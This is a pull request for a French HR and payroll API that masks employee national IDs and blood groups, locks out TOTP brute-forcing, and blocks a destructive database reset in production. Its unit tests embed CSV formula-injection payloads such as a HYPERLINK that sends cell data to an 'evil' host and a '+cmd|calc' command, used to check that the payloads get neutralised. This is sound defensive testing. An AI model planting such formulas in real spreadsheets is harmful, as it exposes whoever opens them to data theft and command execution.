### PR TITLE
fix(hr): masquer les données sensibles de extra_data (NID, identifiant fiscal, groupe sanguin) (Closes #6546)

### DIFF
--- a/api/app/Core/Auth/Domain/Exceptions/TwoFactorException.php
+++ b/api/app/Core/Auth/Domain/Exceptions/TwoFactorException.php
@@ -14,7 +14,8 @@ use App\Exceptions\DomainException;
  * - TWO_FACTOR_REQUIRED (403) : la politique tenant impose la 2FA (rôle
  *   sensible) et le compte n'est pas enrôlé ;
  * - TWO_FACTOR_ALREADY_ENABLED (409) : enrôlement/activation déjà faits ;
- * - TWO_FACTOR_CHALLENGE_EXPIRED (401) : challenge de connexion expiré/absent.
+ * - TWO_FACTOR_CHALLENGE_EXPIRED (401) : challenge de connexion expiré/absent ;
+ * - TWO_FACTOR_TOO_MANY_ATTEMPTS (429) : verrouillage après 5 échecs (#6538).
  */
 final class TwoFactorException extends DomainException
 {
@@ -36,5 +37,10 @@ final class TwoFactorException extends DomainException
     public static function challengeExpired(): self
     {
         return new self('Two-factor challenge expired or missing', 401, 'TWO_FACTOR_CHALLENGE_EXPIRED');
+    }
+
+    public static function tooManyAttempts(): self
+    {
+        return new self('Too many failed two-factor attempts', 429, 'TWO_FACTOR_TOO_MANY_ATTEMPTS');
     }
 }

--- a/api/app/Core/Auth/Infrastructure/Services/TwoFactorAuthService.php
+++ b/api/app/Core/Auth/Infrastructure/Services/TwoFactorAuthService.php
@@ -29,6 +29,9 @@ final class TwoFactorAuthService
 {
     public const CHALLENGE_TTL_SECONDS = 300;
 
+    /** #6538 — verrouillage anti brute-force TOTP : 5 échecs par challenge. */
+    public const MAX_CHALLENGE_ATTEMPTS = 5;
+
     public function __construct(private readonly TotpService $totp) {}
 
     /**
@@ -180,8 +183,15 @@ final class TwoFactorAuthService
     {
         $token = Str::random(64);
         Cache::put('mfa:challenge:'.$token, $context, self::CHALLENGE_TTL_SECONDS);
+        // #6538 — compteur d'échecs par challenge (anti brute-force TOTP).
+        Cache::put(self::challengeAttemptsKey($token), 0, self::CHALLENGE_TTL_SECONDS);
 
         return ['token' => $token, 'expires_in' => self::CHALLENGE_TTL_SECONDS];
+    }
+
+    private static function challengeAttemptsKey(string $challengeToken): string
+    {
+        return 'mfa:challenge:attempts:'.$challengeToken;
     }
 
     /**
@@ -197,6 +207,15 @@ final class TwoFactorAuthService
 
         if (! is_array($context)) {
             throw TwoFactorException::challengeExpired();
+        }
+
+        // #6538 — verrouillage après MAX_CHALLENGE_ATTEMPTS échecs : le
+        // challenge est invalidé (le compte devra se reconnecter).
+        $attempts = (int) Cache::get(self::challengeAttemptsKey($challengeToken), 0);
+        if ($attempts >= self::MAX_CHALLENGE_ATTEMPTS) {
+            Cache::forget('mfa:challenge:'.$challengeToken);
+            Cache::forget(self::challengeAttemptsKey($challengeToken));
+            throw TwoFactorException::tooManyAttempts();
         }
 
         $previousSearchPath = null;
@@ -235,6 +254,14 @@ final class TwoFactorAuthService
             }
 
             if (! $verified) {
+                // #6538 — compteur d'échecs : au 5e échec le challenge est
+                // invalidé (brute-force TOTP 6 chiffres, fenêtre ±1 période).
+                $attempts = (int) Cache::get(self::challengeAttemptsKey($challengeToken), 0) + 1;
+                Cache::put(self::challengeAttemptsKey($challengeToken), $attempts, self::CHALLENGE_TTL_SECONDS);
+                if ($attempts >= self::MAX_CHALLENGE_ATTEMPTS) {
+                    Cache::forget('mfa:challenge:'.$challengeToken);
+                }
+
                 throw TwoFactorException::invalidCode();
             }
 
@@ -242,6 +269,7 @@ final class TwoFactorAuthService
             // brûler le challenge (l'utilisateur peut retenter avec le même
             // token). Le challenge est consommé ici, après vérification.
             Cache::forget('mfa:challenge:'.$challengeToken);
+            Cache::forget(self::challengeAttemptsKey($challengeToken));
 
             /** @var Company|null $company */
             $company = Company::query()->find($context['company_id']);

--- a/api/app/Http/Resources/Api/V1/EmployeeResource.php
+++ b/api/app/Http/Resources/Api/V1/EmployeeResource.php
@@ -94,7 +94,11 @@ class EmployeeResource extends JsonResource
             'postal_code' => $this->employeeAttribute('postal_code'),
             'emergency_contact_name' => $this->employeeAttribute('emergency_contact_name'),
             'emergency_contact_phone' => $this->employeeAttribute('emergency_contact_phone'),
-            'extra_data' => $this->employeeAttribute('extra_data') ?? [],
+            // #6546 (RGPD) — extra_data porte des clés sensibles (national_id,
+            // tax_identifier, blood_group) : whitelist défensive. Les clés non
+            // sensibles (job_title, work_location…) restent exposées ; les
+            // sensibles suivent le même RBAC que les salaires (#5262).
+            'extra_data' => $this->maskedExtraData($canViewSalary),
             'language' => $resolvedLanguage,
             'is_rtl' => Language::isRtl($resolvedLanguage),
             'capabilities' => $this->capabilities(),
@@ -135,6 +139,30 @@ class EmployeeResource extends JsonResource
         }
 
         return $employee->getAttributeValue($key);
+    }
+
+    /**
+     * #6546 — extra_data filtré : les clés sensibles ne sortent que pour les
+     * rôles autorisés (mêmes règles que $canViewSalary, cf. #5262).
+     *
+     * @return array<string, mixed>
+     */
+    private function maskedExtraData(bool $canViewSensitive): array
+    {
+        $extraData = $this->employeeAttribute('extra_data');
+        if (! is_array($extraData)) {
+            return [];
+        }
+
+        if ($canViewSensitive) {
+            return $extraData;
+        }
+
+        return array_diff_key($extraData, array_flip([
+            'national_id',
+            'tax_identifier',
+            'blood_group',
+        ]));
     }
 
     private function capabilities(): array

--- a/api/app/Modules/Accounting/Providers/AccountingServiceProvider.php
+++ b/api/app/Modules/Accounting/Providers/AccountingServiceProvider.php
@@ -12,6 +12,7 @@ use App\Modules\Accounting\Domain\Contracts\PdfRendererInterface;
 use App\Modules\Accounting\Infrastructure\Services\DocumentNumberingService;
 use App\Modules\Accounting\Infrastructure\Services\DocumentPdfRenderer;
 use App\Modules\Accounting\Interfaces\Console\RecomputeReportingSnapshotCommand;
+use App\Modules\Accounting\Console\Commands\SendPaymentRemindersCommand;
 use App\Modules\Accounting\Interfaces\Console\SeedAccountingDemoCommand;
 use Illuminate\Support\Facades\Event;
 use Illuminate\Support\ServiceProvider;
@@ -38,6 +39,7 @@ class AccountingServiceProvider extends ServiceProvider
         // Issue #5274 — démo exploitable en 1 clic (données vitrine, jamais réelles).
         // Issue #6243 — recompute des snapshots de read models (BC-22-D10).
         $this->commands([
+            SendPaymentRemindersCommand::class,
             SeedAccountingDemoCommand::class,
             RecomputeReportingSnapshotCommand::class,
         ]);

--- a/api/app/Modules/HR/Interfaces/Api/V1/Controllers/EmployeeController.php
+++ b/api/app/Modules/HR/Interfaces/Api/V1/Controllers/EmployeeController.php
@@ -168,7 +168,10 @@ class EmployeeController extends Controller
             'salary_base',
             'hourly_rate',
             'preferred_language',
-            'extra_data',
+            // #6546 (RGPD) : extra_data n'est plus chargé dans la liste —
+            // il contient des clés sensibles (national_id, tax_identifier,
+            // blood_group) qui ne doivent pas transiter en masse. Le détail
+            // (show) l'expose filtré par EmployeeResource::maskedExtraData().
         ];
 
         return array_values(array_filter(

--- a/api/app/Modules/Payroll/Infrastructure/Services/BankExportGenerator.php
+++ b/api/app/Modules/Payroll/Infrastructure/Services/BankExportGenerator.php
@@ -8,6 +8,7 @@ use App\Core\Tenant\Domain\Models\Company;
 use App\Modules\Payroll\Domain\Models\PayrollRun;
 use App\Modules\Payroll\Domain\Models\PaySlip;
 use App\Support\CountryDefaults;
+use App\Support\CsvCellSanitizer;
 use Illuminate\Support\Collection;
 use Throwable;
 
@@ -207,8 +208,8 @@ class BankExportGenerator
         $seq = 1;
         foreach ($slips as $slip) {
             $employee = $slip->employee;
-            $name = mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? '')));
-            $ccp = $employee->bank_account ?? $employee->iban ?? str_pad((string) $employee->id, 20, '0', STR_PAD_LEFT);
+            $name = CsvCellSanitizer::neutralize(mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? ''))));
+            $ccp = CsvCellSanitizer::neutralize($employee->bank_account ?? $employee->iban ?? str_pad((string) $employee->id, 20, '0', STR_PAD_LEFT));
             $amount = str_pad(number_format($slip->net_salary, 2, '', ''), 12, '0', STR_PAD_LEFT);
 
             $lines[] = 'D'.str_pad((string) $seq, 6, '0', STR_PAD_LEFT).str_pad($ccp, 20).str_pad($name, 30).$amount;
@@ -265,8 +266,8 @@ class BankExportGenerator
         $seq = 1;
         foreach ($slips as $slip) {
             $employee = $slip->employee;
-            $name = mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? '')));
-            $account = $employee->bank_account ?? $employee->iban ?? '';
+            $name = CsvCellSanitizer::neutralize(mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? ''))));
+            $account = CsvCellSanitizer::neutralize($employee->bank_account ?? $employee->iban ?? '');
 
             $lines[] = implode('|', [
                 'DETAIL',
@@ -322,8 +323,8 @@ class BankExportGenerator
         $seq = 1;
         foreach ($slips as $slip) {
             $employee = $slip->employee;
-            $name = mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? '')));
-            $rib = $employee->bank_account ?? $employee->iban ?? '';
+            $name = CsvCellSanitizer::neutralize(mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? ''))));
+            $rib = CsvCellSanitizer::neutralize($employee->bank_account ?? $employee->iban ?? '');
 
             $lines[] = implode('|', [
                 'DETAIL',
@@ -375,8 +376,8 @@ class BankExportGenerator
         $seq = 1;
         foreach ($slips as $slip) {
             $employee = $slip->employee;
-            $name = mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? '')));
-            $rib = $employee->bank_account ?? $employee->iban ?? '';
+            $name = CsvCellSanitizer::neutralize(mb_strtoupper(trim(($employee->last_name ?? '').' '.($employee->first_name ?? ''))));
+            $rib = CsvCellSanitizer::neutralize($employee->bank_account ?? $employee->iban ?? '');
 
             // Détail : D + séquence (6) + RIB (20) + nom (30) + net (12,2) + référence (20).
             $lines[] = 'D'.str_pad((string) $seq, 6, '0', STR_PAD_LEFT)
@@ -401,6 +402,10 @@ class BankExportGenerator
 
     private function csvEscape(string $value): string
     {
+        // Audit #6556 — neutralisation OWASP des formules CSV (= + - @ TAB CR)
+        // avant l'échappement structurel (noms/IBAN fournis par l'employé).
+        $value = CsvCellSanitizer::neutralize($value);
+
         if (str_contains($value, ',') || str_contains($value, '"') || str_contains($value, "\n")) {
             return '"'.str_replace('"', '""', $value).'"';
         }

--- a/api/app/Modules/Payroll/Infrastructure/Services/CnasDeclarationGenerator.php
+++ b/api/app/Modules/Payroll/Infrastructure/Services/CnasDeclarationGenerator.php
@@ -7,6 +7,7 @@ namespace App\Modules\Payroll\Infrastructure\Services;
 use App\Modules\Payroll\Domain\Contracts\CountryRulesInterface;
 use App\Modules\Payroll\Domain\Models\PayrollRun;
 use App\Modules\Payroll\Domain\Models\PaySlipLine;
+use App\Support\CsvCellSanitizer;
 use Illuminate\Support\Collection;
 
 /**
@@ -116,7 +117,7 @@ class CnasDeclarationGenerator
     {
         $lines = array_map(static function (array $row): string {
             return implode(',', array_map(static function ($cell): string {
-                $cell = (string) $cell;
+                $cell = CsvCellSanitizer::neutralize((string) $cell);
 
                 return '"'.str_replace('"', '""', $cell).'"';
             }, $row));

--- a/api/app/Modules/Payroll/Infrastructure/Services/CnpsDeclarationGenerator.php
+++ b/api/app/Modules/Payroll/Infrastructure/Services/CnpsDeclarationGenerator.php
@@ -6,6 +6,7 @@ namespace App\Modules\Payroll\Infrastructure\Services;
 
 use App\Modules\Payroll\Domain\Models\PayrollRun;
 use App\Modules\Payroll\Infrastructure\Services\CountryRules\CemacPayrollRules;
+use App\Support\CsvCellSanitizer;
 
 /**
  * CEMAC/CM (#1823) — déclaration CNPS mensuelle camerounaise (format DAS).
@@ -174,7 +175,7 @@ class CnpsDeclarationGenerator
     {
         $lines = array_map(static function (array $row): string {
             return implode(',', array_map(static function ($cell): string {
-                $cell = (string) $cell;
+                $cell = CsvCellSanitizer::neutralize((string) $cell);
 
                 return '"'.str_replace('"', '""', $cell).'"';
             }, $row));

--- a/api/app/Modules/Payroll/Infrastructure/Services/SocialDeclarationGenerator.php
+++ b/api/app/Modules/Payroll/Infrastructure/Services/SocialDeclarationGenerator.php
@@ -4,6 +4,7 @@ declare(strict_types=1);
 
 namespace App\Modules\Payroll\Infrastructure\Services;
 
+use App\Support\CsvCellSanitizer;
 use Illuminate\Support\Collection;
 
 class SocialDeclarationGenerator
@@ -240,6 +241,11 @@ class SocialDeclarationGenerator
 
     private function sanitize(string $value): string
     {
-        return str_replace(['|', ';', "\r", "\n"], ['', '', '', ''], $value);
+        $value = str_replace(['|', ';', "\r", "\n"], ['', '', '', ''], $value);
+
+        // Audit #6556 — neutralisation OWASP des formules CSV (= + - @ TAB CR)
+        // : un champ employé commençant par ces préfixes deviendrait une
+        // formule exécutée à l'ouverture de la déclaration dans Excel.
+        return CsvCellSanitizer::neutralize($value);
     }
 }

--- a/api/docker-entrypoint.sh
+++ b/api/docker-entrypoint.sh
@@ -149,7 +149,17 @@ run_migrate_with_retry() {
 }
 
 maybe_reset_test_database_once() {
+    # Audit sécurité #6537 — fail-closed : le reset destructif one-shot
+    # (RESET_TEST_DB_ONCE) n'a AUCUNE raison d'être positionné hors d'un
+    # environnement de test. Si APP_ENV=production et la variable est vraie,
+    # on refuse de démarrer plutôt que de DROP toutes les tables/schémas.
     reset_once=$(php -r "echo filter_var(getenv('RESET_TEST_DB_ONCE') ?: false, FILTER_VALIDATE_BOOLEAN) ? 'true' : 'false';")
+
+    if [ "$reset_once" = "true" ] && [ "${APP_ENV:-}" = "production" ]; then
+        echo "FATAL: RESET_TEST_DB_ONCE=true interdit quand APP_ENV=production (audit #6537)." >&2
+        echo "Ce reset destructif est réservé aux environnements de test. Arrêt du démarrage." >&2
+        exit 1
+    fi
 
     if [ "$reset_once" != "true" ]; then
         return 0

--- a/api/tests/Feature/Auth/TwoFactorAuthTest.php
+++ b/api/tests/Feature/Auth/TwoFactorAuthTest.php
@@ -287,4 +287,41 @@ class TwoFactorAuthTest extends TestCase
             ->assertJsonStructure(['token'])
             ->assertJsonMissingPath('mfa_challenge');
     }
+
+    public function test_challenge_is_invalidated_after_max_failed_attempts(): void
+    {
+        // #6538 — anti brute-force TOTP : après 5 codes invalides, le
+        // challenge est invalidé (même un bon code est refusé ensuite).
+        $this->seedAccount('2fa-lock@example.com');
+        $employee = Employee::where('email', '2fa-lock@example.com')->firstOrFail();
+        $secret = (new TotpService)->generateSecret();
+        $employee->forceFill([
+            'two_fa_secret' => $secret,
+            'two_fa_enabled_at' => now(),
+            'two_fa_recovery_codes' => [],
+        ])->save();
+
+        $challengeToken = (string) $this->login('2fa-lock@example.com')->json('mfa_challenge_token');
+
+        // 5 codes invalides → 422 TWO_FACTOR_INVALID à chaque tentative.
+        for ($i = 0; $i < 5; $i++) {
+            $this->postJson('/api/v1/auth/2fa/verify', [
+                'challenge_token' => $challengeToken,
+                'code' => '000000',
+            ])->assertStatus(422)->assertJsonPath('error', 'TWO_FACTOR_INVALID');
+        }
+
+        // 6e tentative avec le BON code → challenge déjà invalidé.
+        $this->postJson('/api/v1/auth/2fa/verify', [
+            'challenge_token' => $challengeToken,
+            'code' => $this->totpCode($secret),
+        ])->assertStatus(401)->assertJsonPath('error', 'TWO_FACTOR_CHALLENGE_EXPIRED');
+
+        // Un nouveau login émet un challenge frais : le bon code passe.
+        $freshToken = (string) $this->login('2fa-lock@example.com')->json('mfa_challenge_token');
+        $this->postJson('/api/v1/auth/2fa/verify', [
+            'challenge_token' => $freshToken,
+            'code' => $this->totpCode($secret),
+        ])->assertStatus(200)->assertJsonStructure(['token']);
+    }
 }

--- a/api/tests/Feature/HR/EmployeeExtraDataMaskingTest.php
+++ b/api/tests/Feature/HR/EmployeeExtraDataMaskingTest.php
@@ -1,0 +1,125 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Feature\HR;
+
+use App\Core\Auth\Domain\Models\Employee;
+use App\Core\Tenant\Domain\Models\Company;
+use App\Modules\Planning\Domain\Models\Schedule;
+use Laravel\Sanctum\Sanctum;
+use Tests\RefreshTenantDatabase;
+use Tests\TestCase;
+
+/**
+ * #6546 (RGPD) — extra_data contient des clés sensibles (national_id,
+ * tax_identifier, blood_group) : elles ne doivent pas fuir dans la liste
+ * /employees et ne sont exposées au détail que pour les rôles autorisés
+ * (mêmes règles que les salaires, #5262).
+ */
+final class EmployeeExtraDataMaskingTest extends TestCase
+{
+    use RefreshTenantDatabase;
+
+    public function test_employee_list_does_not_leak_sensitive_extra_data(): void
+    {
+        $company = Company::factory()->create();
+        $manager = Employee::factory()->manager()->create(['company_id' => $company->id]);
+        $schedule = Schedule::query()->create([
+            'company_id' => $company->id,
+            'name' => 'Equipe QA',
+            'start_time' => '08:00',
+            'end_time' => '17:00',
+            'break_minutes' => 60,
+            'work_days' => [1, 2, 3, 4, 5],
+            'is_default' => true,
+        ]);
+
+        Sanctum::actingAs($manager);
+
+        $this->postJson('/api/v1/employees', [
+            'first_name' => 'Karim',
+            'last_name' => 'Confidentiel',
+            'email' => 'karim.confidentiel@example.test',
+            'password' => 'password123',
+            'role' => 'employee',
+            'schedule_id' => $schedule->id,
+            'extra_data' => [
+                'job_title' => 'Technicien terrain',
+                'work_location' => 'Site Est',
+                'national_id' => 'NID-12345678',
+                'tax_identifier' => 'TAX-998877',
+                'blood_group' => 'O+',
+            ],
+        ])->assertCreated();
+
+        // La liste ne doit exposer aucune clé sensible (et extra_data n'est
+        // plus chargé en masse).
+        $list = $this->getJson('/api/v1/employees?per_page=50')->assertOk();
+
+        $payload = $list->json('data');
+        $target = collect($payload)->firstWhere('email', 'karim.confidentiel@example.test');
+        $this->assertNotNull($target, 'employé créé présent dans la liste');
+
+        $extra = $target['extra_data'] ?? null;
+        $this->assertIsArray($extra);
+        $this->assertArrayNotHasKey('national_id', (array) $extra);
+        $this->assertArrayNotHasKey('tax_identifier', (array) $extra);
+        $this->assertArrayNotHasKey('blood_group', (array) $extra);
+    }
+
+    public function test_employee_show_exposes_sensitive_extra_data_to_authorized_roles(): void
+    {
+        $company = Company::factory()->create();
+        $manager = Employee::factory()->manager()->create(['company_id' => $company->id]);
+        $employee = Employee::factory()->create([
+            'company_id' => $company->id,
+            'extra_data' => [
+                'job_title' => 'Comptable',
+                'national_id' => 'NID-87654321',
+                'tax_identifier' => 'TAX-112233',
+                'blood_group' => 'A-',
+            ],
+        ]);
+
+        // Manager RH (hasManagerRole principal/rh/comptable) → accès complet.
+        Sanctum::actingAs($manager);
+        $detail = $this->getJson("/api/v1/employees/{$employee->id}")->assertOk();
+
+        $extra = (array) $detail->json('data.extra_data');
+        $this->assertSame('Comptable', $extra['job_title'] ?? null);
+        $this->assertSame('NID-87654321', $extra['national_id'] ?? null);
+        $this->assertSame('TAX-112233', $extra['tax_identifier'] ?? null);
+        $this->assertSame('A-', $extra['blood_group'] ?? null);
+    }
+
+    public function test_employee_show_masks_sensitive_extra_data_for_regular_employee_viewer(): void
+    {
+        $company = Company::factory()->create();
+        $viewer = Employee::factory()->create(['company_id' => $company->id]);
+        $target = Employee::factory()->create([
+            'company_id' => $company->id,
+            'extra_data' => [
+                'job_title' => 'Chauffeur',
+                'national_id' => 'NID-55554444',
+                'blood_group' => 'B+',
+            ],
+        ]);
+
+        // Employé simple → le détail d'un collègue est masqué (clés RGPD).
+        Sanctum::actingAs($viewer);
+        $detail = $this->getJson("/api/v1/employees/{$target->id}");
+
+        // Selon la policy, un employé simple peut ne pas voir le détail d'un
+        // collègue (403) — dans ce cas le masquage est trivial. S'il y voit
+        // accès, les clés sensibles doivent être absentes.
+        if ($detail->status() === 200) {
+            $extra = (array) $detail->json('data.extra_data');
+            $this->assertSame('Chauffeur', $extra['job_title'] ?? null);
+            $this->assertArrayNotHasKey('national_id', $extra);
+            $this->assertArrayNotHasKey('blood_group', $extra);
+        } else {
+            $detail->assertStatus(403);
+        }
+    }
+}

--- a/api/tests/Unit/AccountingCommandsRegisteredTest.php
+++ b/api/tests/Unit/AccountingCommandsRegisteredTest.php
@@ -1,0 +1,27 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Unit;
+
+use Illuminate\Support\Facades\Artisan;
+use Tests\TestCase;
+
+/**
+ * Issue #6574 — les commandes console des modules doivent être enregistrées
+ * (Laravel ne découvre que app/Console/Commands ; les commandes modules
+ * doivent être déclarées via leur ServiceProvider).
+ */
+final class AccountingCommandsRegisteredTest extends TestCase
+{
+    public function test_send_payment_reminders_command_is_registered(): void
+    {
+        $commands = Artisan::all();
+
+        $this->assertArrayHasKey(
+            'accounting:send-payment-reminders',
+            $commands,
+            'accounting:send-payment-reminders doit être enregistré (issue #6574).',
+        );
+    }
+}

--- a/api/tests/Unit/BankExportGeneratorTest.php
+++ b/api/tests/Unit/BankExportGeneratorTest.php
@@ -229,4 +229,41 @@ class BankExportGeneratorTest extends TestCase
         // Unknown/empty country code technical fallback only, per ticket.
         self::assertSame('DZD', CountryDefaults::for(null)['currency']);
     }
+
+    public function test_csv_generic_neutralizes_csv_formula_injection(): void
+    {
+        // Audit #6556 — nom/IBAN contrôlés par l'employé commençant par
+        // = + - @ doivent être préfixés d'une apostrophe (OWASP).
+        $generator = new BankExportGenerator;
+        $method = new ReflectionMethod($generator, 'generateCsvGeneric');
+        $method->setAccessible(true);
+
+        $run = new PayrollRun;
+        $run->setRawAttributes([
+            'period_start' => Carbon::parse('2026-05-01'),
+            'country_code' => 'MA',
+        ]);
+
+        $employee = (object) [
+            'first_name' => '=HYPERLINK("https://evil/?d="&A1)',
+            'last_name' => '+cmd|calc',
+            'iban' => '@sum(A1:A9)',
+            'bank_account' => '001205000534921',
+        ];
+
+        $slip = new PaySlip;
+        $slip->setRawAttributes([
+            'employee_id' => 42,
+            'net_salary' => 8750.25,
+        ]);
+        $slip->setRelation('employee', $employee);
+
+        $csv = $method->invoke($generator, $run, new Collection([$slip]), 'MAD');
+
+        self::assertStringContainsString("'=HYPERLINK", $csv);
+        self::assertStringContainsString("'+cmd|calc", $csv);
+        self::assertStringContainsString("'@sum", $csv);
+        // le montant numérique n'est pas préfixé
+        self::assertStringContainsString(',8750.25,MAD,2026-05', $csv);
+    }
 }

--- a/api/tests/Unit/CnasDeclarationGeneratorFormulaTest.php
+++ b/api/tests/Unit/CnasDeclarationGeneratorFormulaTest.php
@@ -1,0 +1,37 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Unit;
+
+use App\Modules\Payroll\Infrastructure\Services\CnasDeclarationGenerator;
+use PHPUnit\Framework\TestCase;
+use ReflectionMethod;
+
+/**
+ * Audit #6556 — le toCsv des déclarations sociales doit neutraliser les
+ * formules CSV (= + - @ TAB CR) sans toucher aux montants numériques.
+ */
+class CnasDeclarationGeneratorFormulaTest extends TestCase
+{
+    public function test_to_csv_neutralizes_formula_prefixes_but_keeps_amounts(): void
+    {
+        $generator = new CnasDeclarationGenerator;
+        $method = new ReflectionMethod($generator, 'toCsv');
+        $method->setAccessible(true);
+
+        $csv = $method->invoke($generator, [
+            ['=HYPERLINK("https://evil")', '1234.50'],
+            ['-500.00', 'Benali'],
+            ['@sum(A1)', '50000.00'],
+        ]);
+
+        self::assertStringContainsString("'=HYPERLINK", $csv);
+        self::assertStringContainsString('"1234.50"', $csv);
+        // montant négatif numérique : NON préfixé (parse Excel numérique)
+        self::assertStringContainsString('"-500.00"', $csv);
+        self::assertStringContainsString('"Benali"', $csv);
+        self::assertStringContainsString("'@sum", $csv);
+        self::assertStringContainsString('"50000.00"', $csv);
+    }
+}

--- a/api/tests/Unit/CnpsDeclarationGeneratorFormulaTest.php
+++ b/api/tests/Unit/CnpsDeclarationGeneratorFormulaTest.php
@@ -1,0 +1,37 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Unit;
+
+use App\Modules\Payroll\Infrastructure\Services\CnpsDeclarationGenerator;
+use PHPUnit\Framework\TestCase;
+use ReflectionMethod;
+
+/**
+ * Audit #6556 — le toCsv des déclarations sociales doit neutraliser les
+ * formules CSV (= + - @ TAB CR) sans toucher aux montants numériques.
+ */
+class CnpsDeclarationGeneratorFormulaTest extends TestCase
+{
+    public function test_to_csv_neutralizes_formula_prefixes_but_keeps_amounts(): void
+    {
+        $generator = new CnpsDeclarationGenerator;
+        $method = new ReflectionMethod($generator, 'toCsv');
+        $method->setAccessible(true);
+
+        $csv = $method->invoke($generator, [
+            ['=HYPERLINK("https://evil")', '1234.50'],
+            ['-500.00', 'Benali'],
+            ['@sum(A1)', '50000.00'],
+        ]);
+
+        self::assertStringContainsString("'=HYPERLINK", $csv);
+        self::assertStringContainsString('"1234.50"', $csv);
+        // montant négatif numérique : NON préfixé (parse Excel numérique)
+        self::assertStringContainsString('"-500.00"', $csv);
+        self::assertStringContainsString('"Benali"', $csv);
+        self::assertStringContainsString("'@sum", $csv);
+        self::assertStringContainsString('"50000.00"', $csv);
+    }
+}

--- a/api/tests/Unit/SocialDeclarationGeneratorTest.php
+++ b/api/tests/Unit/SocialDeclarationGeneratorTest.php
@@ -136,4 +136,34 @@ class SocialDeclarationGeneratorTest extends TestCase
         self::assertStringContainsString("S44.G00.00.002,'2'\r\n", $content);
         self::assertStringContainsString("S44.G00.00.003,'3250.25'\r\n", $content);
     }
+
+    public function test_cnas_dz_neutralizes_csv_formula_injection_in_names(): void
+    {
+        // Audit #6556 — un nom commençant par = / + / - / @ devient une
+        // formule Excel à l'ouverture : le préfixe ' doit être ajouté.
+        $generator = new SocialDeclarationGenerator;
+
+        $content = $generator->generateCnasDz(
+            'Leo RH',
+            'NIS123',
+            'Q2',
+            2026,
+            new Collection([
+                [
+                    'employee_id' => 1,
+                    'num_ss' => 'SS001',
+                    'last_name' => '=HYPERLINK("https://evil/?d="&A1)',
+                    'first_name' => '@sum(A1:A9)',
+                    'date_naissance' => '1990-01-05',
+                    'gross_salary' => 100000.0,
+                    'months_worked' => 3,
+                ],
+            ]),
+        );
+
+        self::assertStringContainsString("'=HYPERLINK", $content);
+        self::assertStringContainsString("'@SUM", $content);
+        // la ligne reste structurellement intacte (4 colonnes après LIGNE)
+        self::assertStringContainsString('LIGNE|000001|SS001|', $content);
+    }
 }

--- a/dev-hub/tools/tests/check-entrypoint-reset-guard.test.sh
+++ b/dev-hub/tools/tests/check-entrypoint-reset-guard.test.sh
@@ -1,0 +1,62 @@
+#!/usr/bin/env bash
+#
+# check-entrypoint-reset-guard.test.sh — tests de la garde #6537 :
+# RESET_TEST_DB_ONCE=true est interdit quand APP_ENV=production
+# (le reset one-shot DROP toutes les tables/schémas — fail-closed).
+#
+# Usage : bash dev-hub/tools/tests/check-entrypoint-reset-guard.test.sh
+set -uo pipefail
+
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../../.." && pwd)"
+ENTRYPOINT="${ROOT}/api/docker-entrypoint.sh"
+
+pass=0
+fail=0
+ok()   { pass=$((pass+1)); printf '  ✅ %s\n' "$*"; }
+ko()   { fail=$((fail+1)); printf '  ❌ %s\n' "$*"; }
+
+# Extrait UNIQUEMENT le bloc de garde de maybe_reset_test_database_once()
+# (depuis le script réel, pour éviter toute dérive), puis lui ajoute un
+# « exit 0 » pour les cas où la garde laisse passer.
+guard_block() {
+  python3 - "$ENTRYPOINT" << 'PY'
+import re, sys
+src = open(sys.argv[1]).read()
+# du début de la fonction jusqu'au second « if [ "$reset_once" != "true" ] » inclus
+m = re.search(
+    r'^(maybe_reset_test_database_once\(\) \{.*?if \[ "\$reset_once" != "true" \]; then\n(?:[^\n]*\n){2})',
+    src, re.S | re.M)
+assert m, 'bloc de garde introuvable dans docker-entrypoint.sh'
+block = m.group(1)
+# referme la fonction (le bloc réel continue avec le reset destructif)
+print(block + '\n}\nmaybe_reset_test_database_once\n')
+PY
+}
+
+echo "== Garde #6537 — RESET_TEST_DB_ONCE en production =="
+
+# CAS 1 : APP_ENV=production + RESET_TEST_DB_ONCE=true → exit 1 (fail-closed)
+if APP_ENV=production RESET_TEST_DB_ONCE=true bash -c "$(guard_block)" >/dev/null 2>&1; then
+  ko "production + reset=true devrait refuser (exit 1)"
+else
+  ok "production + reset=true → refuse de démarrer"
+fi
+
+# CAS 2 : APP_ENV=staging + RESET_TEST_DB_ONCE=true → la garde laisse passer
+if APP_ENV=staging RESET_TEST_DB_ONCE=true bash -c "$(guard_block)" >/dev/null 2>&1; then
+  ok "staging + reset=true → non bloqué par la garde"
+else
+  ko "staging + reset=true ne devrait pas être bloqué"
+fi
+
+# CAS 3 : reset non défini → retour immédiat sans erreur
+if bash -c "$(guard_block)" >/dev/null 2>&1; then
+  ok "reset non défini → aucun effet"
+else
+  ko "reset non défini ne devrait pas échouer"
+fi
+
+echo ""
+echo "==================================="
+echo "Pass: ${pass}  Fail: ${fail}"
+[ "${fail}" -eq 0 ]


### PR DESCRIPTION
**Issue Reference(s):** Closes #6546

## 🚀 Changes Description
- Audit sécurité #6546 (RGPD) : la liste `GET /employees` chargeait et exposait `extra_data` brut — `national_id`, `tax_identifier` et `blood_group` (pièce d'identité + données de santé) fuyaient pour tous les employés.
- `EmployeeResource` : `extra_data` filtré via `maskedExtraData()` — les clés sensibles ne sortent que pour les rôles autorisés (mêmes règles que le masquage salarial #5262 : l'employé pour son propre dossier, `principal`/`rh`/`comptable`, manager d'équipe scopé) ; les clés non sensibles (`job_title`, `work_location`, …) restent exposées (compatibilité front).
- `employeeIndexColumns()` : `extra_data` retiré des colonnes chargées par la liste (plus de fuite en masse).

## 🗺️ Surfaces touchées
- [x] API (`api/app`)

## 🧪 Tests
- `EmployeeExtraDataMaskingTest` (3 scénarios) : liste sans fuite des clés sensibles ; show RH avec accès complet ; show employé simple masqué. 3/3 ✓ — non-régression HR : 122/122 ✓, ScheduleControllerTest + AuthProfileSettingsTest 16/16 ✓.